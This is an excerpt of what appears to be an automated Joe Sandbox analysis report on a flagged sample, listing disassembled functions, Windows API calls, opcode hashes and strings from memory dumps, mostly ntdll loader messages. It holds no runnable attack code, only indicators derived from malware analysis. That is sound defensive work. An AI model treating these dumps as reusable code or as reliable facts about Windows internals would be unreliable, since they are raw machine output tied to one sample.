                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 34cceeb0941b3ee2a67cc9c6f450658fbc9a786c57e1f19edd3b6c12f22c4767
                                                    • Instruction ID: 0c2061bfaf80a594025931125d7790c5c7776a48521ad5bcb17f6471027841d1
                                                    • Opcode Fuzzy Hash: 34cceeb0941b3ee2a67cc9c6f450658fbc9a786c57e1f19edd3b6c12f22c4767
                                                    • Instruction Fuzzy Hash: AFE0DFB1200204AFDB14DFA4CC44EE73768EF88354F10855AFD1C9B281C630E810CBB0
                                                    Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 247 41a670-41a686 248 41a68c-41a6a1 RtlFreeHeap 247->248 249 41a687 call 41af60 247->249 249->248
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                    Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 250 41a7d0-41a7e9 251 41a7ef-41a804 LookupPrivilegeValueW 250->251 252 41a7ea call 41af60 250->252 252->251
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                    Function 0041A6A3 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 253 41a6a3-41a6d8 call 41af60 ExitProcess
                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: f4bc0d12741e580fd8341961b3af5887434b358ae5752c5e4236bbcc9cb28c21
                                                    • Instruction ID: a6d89d336e0b8c83ac6892cd906aa14fa15dab9997e4d17c02afebe454f5954a
                                                    • Opcode Fuzzy Hash: f4bc0d12741e580fd8341961b3af5887434b358ae5752c5e4236bbcc9cb28c21
                                                    • Instruction Fuzzy Hash: 13E0C2B03002047BD620DF64CC89FD73F69DF49764F2AC1A8B98DAB242C534EA02C7A5
                                                    Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                    Function 01182C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6be6f1172b680e587512639fdb1a1fc43343166a54fd6db2e6d505164294d7ae
                                                    • Instruction ID: e7f4d61e65c81b80bab9f237f4750aa9cc9bc76564ea464632f9ed30a0aefddf
                                                    • Opcode Fuzzy Hash: 6be6f1172b680e587512639fdb1a1fc43343166a54fd6db2e6d505164294d7ae
                                                    • Instruction Fuzzy Hash: FFB09B71D019C5C5DF16F7644708717790077D1701F25C061D2134645F473CC1D1E675

                                                    Non-executed Functions

                                                    Function 011C2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2160512332
                                                    • Opcode ID: 199d7836dc8c03e02fb984a875d4a8e68e95401d0b89da5daed25c27a823fc1a
                                                    • Instruction ID: 99094ed79f37d37a1c74f0f73dc003cf4a604f7e8c21edb828993924f28a2dc4
                                                    • Opcode Fuzzy Hash: 199d7836dc8c03e02fb984a875d4a8e68e95401d0b89da5daed25c27a823fc1a
                                                    • Instruction Fuzzy Hash: CD929F71614742AFE729DF28C880F6BB7E8BBA4B54F04492DFA94D7250D770E844CB92
                                                    Function 01178620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 011B5543
                                                    • double initialized or corrupted critical section, xrefs: 011B5508
                                                    • Critical section debug info address, xrefs: 011B541F, 011B552E
                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011B54CE
                                                    • undeleted critical section in freed memory, xrefs: 011B542B
                                                    • Address of the debug info found in the active list., xrefs: 011B54AE, 011B54FA
                                                    • Thread identifier, xrefs: 011B553A
                                                    • Invalid debug info address of this critical section, xrefs: 011B54B6
                                                    • 8, xrefs: 011B52E3
                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011B54E2
                                                    • Critical section address, xrefs: 011B5425, 011B54BC, 011B5534
                                                    • corrupted critical section, xrefs: 011B54C2
                                                    • Critical section address., xrefs: 011B5502
                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011B540A, 011B5496, 011B5519
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                    • API String ID: 0-2368682639
                                                    • Opcode ID: e364782040ba47d618120cd20e672b1f40e168984ca49ffe3e22d634c53d2e61
                                                    • Instruction ID: 1094ec94fc61aa333bd0eebb7f3223972d6588d09c2fbfb1dc0df6eb36e094fd
                                                    • Opcode Fuzzy Hash: e364782040ba47d618120cd20e672b1f40e168984ca49ffe3e22d634c53d2e61
                                                    • Instruction Fuzzy Hash: 3B818AB0A41359EFEB68CF99C889BAEBBF6FB48714F104119F504B7250D3B5A941CB60
                                                    Function 011729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011B2506
                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011B2498
                                                    • @, xrefs: 011B259B
                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011B2602
                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011B2412
                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 011B261F
                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011B22E4
                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011B25EB
                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011B24C0
                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011B2624
                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011B2409
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                    • API String ID: 0-4009184096
                                                    • Opcode ID: b84b9d961732211797afe29bc486f4b076eff6395c28efe906d7910b46bc2e26
                                                    • Instruction ID: 4b09d52678da1365dae56274f0477491283c3dcdfde389006128025be5ac71e2
                                                    • Opcode Fuzzy Hash: b84b9d961732211797afe29bc486f4b076eff6395c28efe906d7910b46bc2e26
                                                    • Instruction Fuzzy Hash: AE0271F1D002299BDB39DB54CC80BEAB7B8AF54704F0141DAE649A7241EB70AF85CF59
                                                    Function 011E8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                    • API String ID: 0-2515994595
                                                    • Opcode ID: f480fcc3edbb1342687c5f1fdd1eb58b3f980e834b222a24f3f30425d477d528
                                                    • Instruction ID: c6444ed944b677fc2bc4e6e00346fd60bb3ab61a71b08f2dabf0c7e25c681d80
                                                    • Opcode Fuzzy Hash: f480fcc3edbb1342687c5f1fdd1eb58b3f980e834b222a24f3f30425d477d528
                                                    • Instruction Fuzzy Hash: 5051EF71104B019BC32DDF588848BABBBECFF99654F14492DFA99C3284E771D608CB92
                                                    Function 011F0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                    • API String ID: 0-1700792311
                                                    • Opcode ID: 7529bc2a1fc94893d8ee0b9d80f065d62d3081eba68a544f18be6a5e6f0eb4a8
                                                    • Instruction ID: 1ee0ed4f0c99463773f69962d42e145576979f469d67e7a59c6e908772ba4d17
                                                    • Opcode Fuzzy Hash: 7529bc2a1fc94893d8ee0b9d80f065d62d3081eba68a544f18be6a5e6f0eb4a8
                                                    • Instruction Fuzzy Hash: 4BD1FB31604682DFDB2EDF68C405AAABBF2FF8A714F09805DF6459B252E734D981CB14
                                                    Function 011C89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 011C8A3D
                                                    • HandleTraces, xrefs: 011C8C8F
                                                    • VerifierDebug, xrefs: 011C8CA5
                                                    • VerifierFlags, xrefs: 011C8C50
                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 011C8A67
                                                    • AVRF: -*- final list of providers -*- , xrefs: 011C8B8F
                                                    • VerifierDlls, xrefs: 011C8CBD
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                    • API String ID: 0-3223716464
                                                    • Opcode ID: 30c91f7e8cf98be009e675d879ca8682e6ecb023c7f8a3ab6c8a998e4acebb73
                                                    • Instruction ID: bf1a8844659b51b5028d5942862fc407f8fecc39a7276ba669431673e69a2b1c
                                                    • Opcode Fuzzy Hash: 30c91f7e8cf98be009e675d879ca8682e6ecb023c7f8a3ab6c8a998e4acebb73
                                                    • Instruction Fuzzy Hash: E79137B1645712AFD72DDF68E8C4B6AB7E4ABA4F18F06041CFA446B240C770DD01CB96
                                                    Function 0114EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                    • API String ID: 0-1109411897
                                                    • Opcode ID: a2badc4d905e5bee24e6d261ec015d63d9603a6b88d03c60b1b44a61e9292568
                                                    • Instruction ID: fc073f29a676e61315858f50ea94ba9b4cc33ba637fa02e2d133ea414e933c4b
                                                    • Opcode Fuzzy Hash: a2badc4d905e5bee24e6d261ec015d63d9603a6b88d03c60b1b44a61e9292568
                                                    • Instruction Fuzzy Hash: FFA25774A0562ACFDB68CF18C888BA9BBB1BF45704F5442E9D90DA7750DB749E81CF01
                                                    Function 011763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-792281065
                                                    • Opcode ID: dba52b7e7c4d2f232d10c64b0042aa14d2be0a0e8c491ee31dd058e776b28608
                                                    • Instruction ID: 0b52620588a08be65255da9c503581000860f6b6bbe73c198c4837f34711cdc4
                                                    • Opcode Fuzzy Hash: dba52b7e7c4d2f232d10c64b0042aa14d2be0a0e8c491ee31dd058e776b28608
                                                    • Instruction Fuzzy Hash: 04913770B00B15ABFB2DDF18F888BEA7BB1BF51B18F044168E5066B782D7749801C791
                                                    Function 0113645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01199A2A
                                                    • apphelp.dll, xrefs: 01136496
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01199A11, 01199A3A
                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01199A01
                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011999ED
                                                    • LdrpInitShimEngine, xrefs: 011999F4, 01199A07, 01199A30
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-204845295
                                                    • Opcode ID: 69590ee9e5b0bfe99282936aedfeb668c0c3bdaecc9dcb7d42785a19dbbdbb58
                                                    • Instruction ID: 2beaacda1fadfe62b963978a5dab22eee1708115b79464e24b0d84be65f08692
                                                    • Opcode Fuzzy Hash: 69590ee9e5b0bfe99282936aedfeb668c0c3bdaecc9dcb7d42785a19dbbdbb58
                                                    • Instruction Fuzzy Hash: CC519171208305AFEB2DDF24D845BAB77E8FB84648F00492DE59597194E734EA44CB93
                                                    Function 01172674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SXS: %s() passed the empty activation context, xrefs: 011B2165
                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011B219F
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011B2178
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011B2180
                                                    • RtlGetAssemblyStorageRoot, xrefs: 011B2160, 011B219A, 011B21BA
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011B21BF
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                    • API String ID: 0-861424205
                                                    • Opcode ID: 65e97a0a7081400adace87d87a39dd498900bcd8fbf3484fd12e0eec31a6afdb
                                                    • Instruction ID: f8cc2e2e5ceb6e3c2ba68e1df5619b0dc3d973aabefa0f0ed59074d2ae4ccbb2
                                                    • Opcode Fuzzy Hash: 65e97a0a7081400adace87d87a39dd498900bcd8fbf3484fd12e0eec31a6afdb
                                                    • Instruction Fuzzy Hash: 8C31FB36F4022577F72D8A998C86F9BBB79DB75A90F05405DFB04B7241D370AA02C7A1
                                                    Function 0117C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 011B81E5
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 011B8181, 011B81F5
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0117C6C3
                                                    • Loading import redirection DLL: '%wZ', xrefs: 011B8170
                                                    • LdrpInitializeProcess, xrefs: 0117C6C4
                                                    • LdrpInitializeImportRedirection, xrefs: 011B8177, 011B81EB
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-475462383
                                                    • Opcode ID: e25ca7722a948e6020a81606f014410bad7bd9bc00aa600c42939b7fee91f237
                                                    • Instruction ID: 65e6007e50023a77f4a2600a0ecb46e951c06d7976bd8484261e4e173f589800
                                                    • Opcode Fuzzy Hash: e25ca7722a948e6020a81606f014410bad7bd9bc00aa600c42939b7fee91f237
                                                    • Instruction Fuzzy Hash: 5631F571644346AFD21CEF29D886F5A77E8EF94B18F04055CF944AB391E720ED04CBA2
                                                    Function 0118096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 01182DF0: LdrInitializeThunk.NTDLL ref: 01182DFA
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180BA3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180BB6
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180D60
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180D74
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                    • String ID:
                                                    • API String ID: 1404860816-0
                                                    • Opcode ID: 9bea629e25fa8ab0c753fe9f3cb134865eff84d677fdbb494ff52f4467eb3211
                                                    • Instruction ID: 0ea613a75771d0ce09003bd1c7241e3604afd231a4843f1312b0ee1184b8f5a9
                                                    • Opcode Fuzzy Hash: 9bea629e25fa8ab0c753fe9f3cb134865eff84d677fdbb494ff52f4467eb3211
                                                    • Instruction Fuzzy Hash: DE427D71900719DFDB69DF28C880BEAB7F4BF48304F1485A9E989DB241E770A985CF61
                                                    Function 0114A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                    • API String ID: 0-379654539
                                                    • Opcode ID: e702f423aa5e9e9330106ae61e6fe37c88a4e02394a16fd4f4c4d3c8b58a39fa
                                                    • Instruction ID: b77db27a0d16c4efe650ac20fb7a555480fd41aeca44d3881e5b0ce9f5aec3fc
                                                    • Opcode Fuzzy Hash: e702f423aa5e9e9330106ae61e6fe37c88a4e02394a16fd4f4c4d3c8b58a39fa
                                                    • Instruction Fuzzy Hash: F6C1AD75148382CFD719CF58D144B6ABBE4FF84B04F0A886AF9968B251E734C949CB93
                                                    Function 01178402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • @, xrefs: 01178591
                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0117855E
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01178421
                                                    • LdrpInitializeProcess, xrefs: 01178422
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1918872054
                                                    • Opcode ID: 4af0f1cd7df60659ddeb99c3e644d79189176b4cfd99b63b4a7439b3e2b30198
                                                    • Instruction ID: 0cc9c0e623cb9648a0485771a7bb96694d86de721431af12dbb8e28fec40e51a
                                                    • Opcode Fuzzy Hash: 4af0f1cd7df60659ddeb99c3e644d79189176b4cfd99b63b4a7439b3e2b30198
                                                    • Instruction Fuzzy Hash: 96918E71508345AFD72AEF65CC84FABBAECBF84744F40492EFA8492251E770D944CB62
                                                    Function 0117273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • .Local, xrefs: 011728D8
                                                    • SXS: %s() passed the empty activation context, xrefs: 011B21DE
